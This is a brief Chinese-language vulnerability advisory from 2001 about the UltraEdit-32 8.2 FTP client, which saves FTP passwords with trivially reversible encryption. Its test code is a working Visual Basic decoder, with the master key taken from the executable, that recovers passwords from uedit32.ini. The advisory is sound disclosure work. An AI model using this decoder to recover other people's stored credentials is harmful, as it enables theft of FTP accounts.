UltraEdit FTP客户端的密码不够强壮问题发布时间:2001-08-25 更新时间:2001-08-25 严重程度:高 威胁程度:口令恢复 错误类型:设计错误 利用方式:服务器模式 受影响系统 IDM Computer Solutions, Inc UltraEdit-32 8.2详细描述 UltraEdit是一个多功能的文本编辑程序,支持HTML, C/C++, VB, Java, Perl, XML, 和 C#. 它还包括HEX编辑器和一个小型FTP客户 端程序。其FTP客户端程序有一个功能就是能记忆FTP密码为下一次 再使用,当这样操作时其对密码的加密算法很简单,导致FTP帐户的 密码可恢复。 测试代码 ' UltraEdit FTP password decryption (stored in uedit32.ini) ' ' Taken from the help-file: ' ' This checkbox determines if UltraEdit will save the password for later ' reference. If not the user will be prompted for the password as required. Note ' ?if the password is saved it is stored on the system. It is encrypted however ' the encryption mechanism is unsophisticated and should not be relied upon as a ' method of security. ' Masterkey. Taken from the UltraEdt.exe Private Const Masterkey = "sdfkh we;34u[ jwef " 'Decode a single character Public Function UEDecode(i_Asc, ByVal i_Pos As Integer) i_Pos = i_Pos Mod 19 If i_Pos = 0 Then i_Pos = 19 UEDecode = ((Not i_Asc) And Asc(Mid(Masterkey, i_Pos, 1))) + (i_Asc And ((Not Asc(Mid(Masterkey, i_Pos, 1))) And 127)) End Function 'Decode password Public Function UEDecodeString(str_password As String) Dim i As Integer UEDecodeString = "" For i = 1 To (Len(str_password) / 2) UEDecodeString = UEDecodeString + Chr$(UEDecode(Val("&H" + Mid(str_password, (2 * (i - 1)) + 1, 2)), i)) Next i End Function 解决方案 不要使用Ultraedit的FTP客户端程序。 相关信息 "E. van Elk" <evelk@dsv.nl> |
